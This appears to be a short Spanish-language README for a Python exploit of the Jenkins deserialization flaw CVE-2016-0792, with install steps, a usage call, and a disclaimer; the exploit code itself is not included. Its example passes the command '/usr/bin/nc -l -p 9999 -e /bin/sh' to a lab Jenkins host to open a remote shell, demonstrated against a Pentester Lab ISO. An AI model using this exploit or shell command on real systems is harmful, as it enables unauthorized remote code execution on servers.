
Exploit para la vulnerabilidad de serialización de Jenkins - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
La librería requests es necesaria para que este exploit funcione
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
Donde url es la url del servidor Jenkins y command es el comando a ejecutar
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
Esto ejecutará nc y escuchará en el puerto 9999 en la máquina vulnerable
Para fines de demostración, ejecutaré la ISO de Pentester Lab
Usar este software para atacar objetivos sin permiso es ilegal. No soy responsable de ningún daño causado por usar este software contra la ley.